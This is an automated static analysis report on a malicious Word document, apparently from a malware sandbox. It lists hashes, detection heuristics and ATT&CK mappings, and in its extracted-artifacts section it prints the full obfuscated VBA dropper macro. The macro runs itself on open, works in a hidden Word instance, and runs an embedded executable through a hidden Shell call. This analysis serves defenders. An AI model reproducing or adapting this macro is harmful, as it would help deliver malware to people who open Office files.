Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d39fdc3659a2ddd3…

MALICIOUS

Office (OLE)

Size: 187.0 KB | Created: 2016-03-01 11:31:00 | Authoring application: Microsoft Office Word | First seen: 2016-03-10
MD5: d9c642068c99f1caac630726f39be3d7
SHA-1: 7e5051f340868aed523dce12cb27e7899b41502b
SHA-256: d39fdc3659a2ddd3e388fdde6e85a55a8af5331c2b6b716884a7bd92afb07de2
Risk Score: 654

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1505.003 Server Software Component: Exploit Public-Facing Application
T1027 Obfuscated Files or Information
T1105 Ingress Tool Transfer

The sample is a malicious Office document containing obfuscated VBA macros. These macros are designed to execute an embedded PE executable, identified as 'embedded_office_00006250.exe'. The macros also attempt to save this executable to the path 'C:\Aaaa\exe\idd2.exe', indicating a payload delivery and execution attempt.

Heuristics (17)

  • ClamAV: BC.Win.Packer.Troll-14 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: BC.Win.Packer.Troll-14
  • XOR-encoded strings (key 0xFA) [critical] SC_XOR_ENCODED
    Found 8 Windows library/API name(s) XOR-encoded with single-byte key 0xFA: 'advapi32.dll', 'wininet.dll', 'shell32.dll', 'shlwapi.dll', 'KERNEL32.DLL', 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'
    Disassembly (attempted x86 opcode disassembly of the XOR-encoded region)
    00015F47  9b                wait
    00015F48  9e                sahf
    00015F49  8c9b8a93c9c8      mov word ptr [ebx - 0x37366c76], ds
    00015F4F  d49e              aam 0x9e
    00015F51  96                xchg esi, eax
    00015F52  96                xchg esi, eax
    00015F53  fa                cli
    00015F54  95                xchg ebp, eax
    00015F55  96                xchg esi, eax
    00015F56  9f                lahf
    00015F57  c9                leave
    00015F58  c8d49e96          enter -0x612c, -0x6a
    00015F5C  96                xchg esi, eax
    00015F5D  fa                cli
    00015F5E  89929f9696c9      mov dword ptr [edx - 0x36696961], edx
    00015F64  c8d49e96          enter -0x612c, -0x6a
    00015F68  96                xchg esi, eax
    00015F69  fa                cli
    00015F6A  8992968d9b8a      mov dword ptr [edx - 0x7564726a], edx
    00015F70  93                xchg ebx, eax
    00015F71  d49e              aam 0x9e
    00015F73  96                xchg esi, eax
    00015F74  96                xchg esi, eax
    00015F75  fa                cli
    00015F76  8f                .byte 0x8f
    00015F77  8896979594d4      mov byte ptr [esi - 0x2b6b6a69], dl
    00015F7D  9e                sahf
    00015F7E  96                xchg esi, eax
    00015F7F  96                xchg esi, eax
    00015F80  fa                cli
    00015F81  8f                .byte 0x8f
    00015F82  899f88c9c8d4      mov dword ptr [edi - 0x2b373678], ebx
    00015F88  9e                sahf
    00015F89  96                xchg esi, eax
    00015F8A  96                xchg esi, eax
    00015F8B  fa                cli
    00015F8C  8f                .byte 0x8f
    00015F8D  899f889f948c      mov dword ptr [edi - 0x736b6078], ebx
    00015F93  d49e              aam 0x9e
    00015F95  96                xchg esi, eax
    00015F96  96                xchg esi, eax
    00015F97  fa                cli
    00015F98  8d939493949f      lea edx, [ebx - 0x606b6c6c]
    00015F9E  8ed4              mov ss, esp
    00015FA0  9e                sahf
    00015FA1  96                xchg esi, eax
    00015FA2  96                xchg esi, eax
    00015FA3  fa                cli
    00015FA4  8d                .byte 0x8d
    00015FA5  89                .byte 0x89
    00015FA6  95                xchg ebp, eax
  • Embedded PE executable [critical] OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Ole10Native package drops an auto-executable payload [critical] OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected [medium] (8 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    urh = Shell(bbe, 0)
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set ygBvdgwQw = CreateObject(WejndHw(23 + 64) & "o" + "rd.Applicatio" + "n" + "")
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ygBvdgwQw = CreateObject(WejndHw(23 + 64) & "o" + "rd.Applicatio" + "n" + "")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro [low] OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    TTGVDW = Environ(BBBDGW) + YGBASDW
  • Reference to GetProcAddress API [high] SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact [high] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2122 bytes
SHA-256: f6d70b144b17be9cbb2f9c98cf6f6ac8589f879108c3cf4191e2593da6ec44ba
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Rotkw()
    Donnj
End Sub
Sub Donnj()
Dim fdaa As Integer
Dim nytr As Boolean, FDFWQD As String
UWSBDS = DatePart("yyyy", "11/10/3117")
UWSBDS = Right(UWSBDS, 1)
BBBDGW = "EM"
fdaa = 7 - 8
nytr = False
On Error Resume Next
YGBASDW = Right("\nfjd\", 1)
BBBDGW = "T" & BBBDGW & Chr(80)
TTGVDW = Environ(BBBDGW) + YGBASDW
RTQCDW = WejndHw(40 + 6)
RREW = RTQCDW + WejndHw(8 + 94 + fdaa)
RREW = RREW & "x" + WejndHw(10 + 81 + 10)
UUIIW = RTQCDW & WejndHw(-6 + 110 + 10) & WejndHw(4 + 110 + 2) + "f"
NFUQWD = TTGVDW

BBBVQWGD = TTGVDW + "fuewq" + UUIIW
DDDHUQWD = TTGVDW + "fbywuq" + UUIIW
FDFWQD = NFUQWD + "idd2" & RREW

Bhgwygd (BBBVQWGD)
Bhgwygd (DDDHUQWD)
Dim hf As Integer
hf = 2
Module1.Godfa (hf)
QWJDQ = TTGVDW + "fuewq" & ".r" & "tf"
VJNASD = "'qpwod 'qlw;kd;q"

Set ygBvdgwQw = CreateObject(WejndHw(23 + 64) & "o" + "rd.Applicatio" + "n" + "")
ygBvdgwQw.Visible = nytr
ygBvdgwQw.Documents.Open (QWJDQ)
Module1.Godfa (2)
HYUASGD = Module1.Trwnw(FDFWQD)
Module1.Godfa (3)
ygBvdgwQw.Quit
Set ygBvdgwQw = Nothing
End Sub
Public Function WejndHw(vbhs As Integer)
    WejndHw = Chr(vbhs)
End Function
Sub Workbook_Open()
    Donnj
End Sub
Sub AutoOpen()
    UQBDWD = ";l12ke ;1lks"
    Rotkw
End Sub
Public Function Bhgwygd(bvhd As String)
ActiveDocument.SaveAs FileName:=bvhd, FileFormat:=wdFormatRTF
End Function
Sub Auto_Open()
    Donnj
End Sub
Attribute VB_Name = "Module1"
Sub Godfa(Tybe As Long)
VBHJSD = "alsj kdlsa"
Dim Hbfw As Long

Dim Iunf As Long
Iunf = Tybe + Timer
Hbfw = Iunf
Do While Timer < Hbfw
DoEvents
Loop
End Sub
Public Function Trwnw(bbe As String)
Dim urh As Variant
urh = Shell(bbe, 0)
End Function
Public Function Abchsdsa(qdasw As String)
Abchsdsa = Right(qdasw, 1)
End Function
embedded_office_00006250.exe | embedded-pe | Office MZ+PE at offset 0x6250 | 166320 bytes
SHA-256: cee8a12a790084dd5d5eb99d66c1c3df388b9bb2959e9633a9b339d82510c300
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1518358960/Ole10Native | 143570 bytes
SHA-256: da1a06d9ff67c0823b79a2f04941964056fb564fd71a174481388521be9b5890
Detection
ClamAV: BC.Win.Packer.Troll-14
Obfuscation or payload: unlikely